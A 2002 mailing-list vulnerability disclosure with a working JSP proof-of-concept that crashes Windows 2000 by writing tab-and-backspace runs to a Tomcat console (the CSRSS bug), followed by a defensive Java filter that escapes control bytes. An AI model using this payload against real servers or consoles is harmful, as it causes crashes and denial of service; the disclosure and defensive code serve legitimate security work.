[VulnWatch] Bluescreen with a JSP on Win2k

From: Marc Schoenefeld (marc.schoenefeld@uni-muenster.de)
Date: 08/03/02


Date: Sat, 03 Aug 2002 08:53:27 +0200 (MES)
From: Marc Schoenefeld <marc.schoenefeld@uni-muenster.de>
To: vulnwatch@vulnwatch.org

Hi,

the following proof-of-concept simply demonstrates how to provoke
a bluescreen with a Java application in certain circumstances.
If you have an Apache Tomcat running in a console window and invoke
the following JSP, you will get a bluescreen on W2K because
of the CSRSS bug (backspace bug), which is still widespread in
many Win32 installations. Other operating systems (*ix) are not
affected, but if you browse a logfile from a Linux machine
containing a CSRSS string on the console of a Windows machine,
this will crash also ....

Have fun with it
Marc

Following: bluescreen.jsp / Tested with Tomcat 4.0.4 started from cmdline,
NT service version not affected, but affected during browsing of the
stdout/stderr logfile
=========================Snip start=========================
<HTML>

<BODY>
<%
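{
        char[] c9 = {9};                 // one horizontal tab (0x09)
        char[] c8 = {8,8,8,8,8,8,8,8};   // eight backspaces (0x08)
        String x = new String(c9);
        String y = new String(c8);
        String z = "";
        // 4096 repetitions of tab + eight backspaces
        for (int i = 0 ; i < 4096; i++) {
            z += x + y;
        }
        // System.out goes to Tomcat's stdout, i.e. the console window
        System.out.println("<<<<<<<START>>>>>>>");
        System.out.println(z);
        System.out.println(z);

        System.out.println("<<<<<<<END>>>>>>>");
    }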

%>
<H1>still alive</H1>

</BODY>

</HTML>
========================snip end=====================

--
-- Mahatma Gandhi--
First they ignore you
Then they laugh at you
Then they fight you
Then you win
-- Mahatma Gandhi--

Marc Schönefeld Dipl. Wirtsch.-Inf. / Software Developer
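
A defensive counterpart to the JSP above, as an added example that is not part of the original post: an output filter that turns tab, backspace and other control bytes into visible `\xNN` text before anything written to stdout/stderr reaches a console window or a logfile. The class name `EscapingConsoleStream` and the idea of installing it once at server startup are assumptions made for illustration, and the sample string is constructed.

```java
import java.io.ByteArrayOutputStream;
import java.io.FilterOutputStream;
import java.io.IOException;
import java.io.OutputStream;
import java.io.PrintStream;

/** Added example (hypothetical class): escapes control bytes before they reach a console or log. */
public class EscapingConsoleStream extends FilterOutputStream {

    public EscapingConsoleStream(OutputStream out) {
        super(out);
    }

    @Override
    public void write(int b) throws IOException {
        int v = b & 0xFF;
        // Line endings, printable ASCII and bytes >= 0x80 (multi-byte text) pass through unchanged.
        if (v == '\n' || v == '\r' || (v >= 0x20 && v != 0x7F)) {
            out.write(v);
            return;
        }
        // Every other control byte (tab 0x09, backspace 0x08, ...) becomes
        // a visible \xNN escape, so the console never interprets it.
        out.write(String.format("\\x%02X", v).getBytes("US-ASCII"));
    }

    @Override
    public void write(byte[] buf, int off, int len) throws IOException {
        // Route bulk writes through the per-byte filter as well.
        for (int i = 0; i < len; i++) write(buf[off + i]);
    }

    public static void main(String[] args) throws IOException {
        // Constructed sample: a short tab + eight-backspace run shaped like the JSP's output.
        String sample = "user=\t\b\b\b\b\b\b\b\b end";

        // Show the filtered form by capturing it in memory first.
        ByteArrayOutputStream captured = new ByteArrayOutputStream();
        PrintStream safe = new PrintStream(new EscapingConsoleStream(captured), true);
        safe.println(sample);
        System.out.println(captured.toString("US-ASCII").trim());

        // Assumption: installed once at startup so all later stdout/stderr output is filtered.
        System.setOut(new PrintStream(new EscapingConsoleStream(System.out), true));
        System.setErr(new PrintStream(new EscapingConsoleStream(System.err), true));
        System.out.println(sample);
    }
}
```

The same filter can wrap the stream a log appender writes to, so that a logfile later browsed on a Windows console contains only the escaped text.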